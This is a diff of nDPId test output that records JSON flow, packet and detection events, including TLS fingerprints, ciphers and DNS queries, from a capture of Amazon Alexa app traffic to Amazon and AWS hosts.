{"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1490976101550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976101550,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgdAAEAGAiSsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pRQAAAgQFtAQCCAoA9mX7AAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1490976101623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976101623,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwX5pAAOcGDZw27xi6rBAq2AG7hRl1e+g1UtF3knASH\/6OkAAAAgQFtAEDAwY="} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100559,"flow_last_seen":1490976100559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100559,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1490976100559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100559,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgZAAEAGAiWsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pqQAAAgQFtAQCCAoA9mWXAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100811,"flow_last_seen":1490976100811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1490976100811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100811,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BwBAAEAGDSusECrYNu8YuoUaAbt\/SWKxAAAAAKAC\/\/9R9gAAAgQFtAQCCAoA9mWxAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100859,"flow_last_seen":1490976100859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100859,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1490976100859,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100859,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8OO5AAEAGq6asECrYNudIWKNhAbuICV1bAAAAAKAC\/\/8AqwAAAgQFtAQCCAoA9mW1AAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1606,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1490976100998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976100998,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw6qtAAOcGgoo27xi6rBAq2AG7hRpDnUSYf0lisnASH\/5McwAAAgQFtAEDAwY="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1490976100999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976100999,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0s4IAACcGiho250hYrBAq2AG7o2ETwX1YiAldXIAS\/\/\/2XwAAAgQFmAMDCAEEAgEB"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1490976100999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976100999,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBwFAAEAGDT6sECrYNu8YuoUaAbt\/SWKyQ51EmVAQAVeW5AAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1490976101000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976101000,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoOO9AAEAGq7msECrYNudIWKNhAbuICV1cE8F9WVAQAVc8uQAA"} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1490976101550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976101550,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgdAAEAGAiSsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pRQAAAgQFtAQCCAoA9mX7AAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1490976101623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976101623,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwX5pAAOcGDZw27xi6rBAq2AG7hRl1e+g1UtF3knASH\/6OkAAAAgQFtAEDAwY="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1490976107217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1490976107217,"pkt":"AMDKkaPvePiC0\/vCCABFAABFWlxAAEARM1KsECrYrBAqATiMADUAMXUjXSIBAAABAAAAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAE="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1490976107359,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976107359,"pkt":"ePiC0\/vCAMDKkaPvCABFAABV3nRAAEARrymsECoBrBAq2AA1OIwAQbpsXSKBgAABAAEAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AAQ27x39"} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1660,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976107359,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.253"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZVhAAEAGqY+sECrYNu8d\/Z+VAbuWKg0YAAAAAKAC\/\/9uYQAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87ItAAEAGIlysECrYNu8d\/Z+WAbsjoITLAAAAAKAC\/\/9pNwAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1663,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107366,"flow_last_seen":1490976107366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107366,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1663,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1490976107366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107366,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY5AAEAGRVmsECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8HXAAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107455,"flow_last_seen":1490976107455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107455,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1490976107455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107455,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fklAAEAGkJ6sECrYNu8d\/Z+YAbtWLhYAAAAAAKAC\/\/+laQAAAgQFtAQCCAoA9mhJAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1490976107475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwq71AAOcGvDU27x39rBAq2AG7n5aOPa1rI6CEzHASH\/6yzwAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1490976107477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107477,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7IxAAEAGIm+sECrYNu8d\/Z+WAbsjoITMjj2tbFAQAVf9QAAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1490976107484,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107484,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkaBAAOcG1lI27x39rBAq2AG7n5UJgL2ZlioNGXASH\/4siQAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1490976107485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107485,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZVlAAEAGqaKsECrYNu8d\/Z+VAbuWKg0ZCYC9mlAQAVd2+gAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1490976107511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107511,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwxddAAOcGohs27x39rBAq2AG7n5iFQQi8Vi4WAXASH\/6ctgAAAgQFtAEDAwY="} 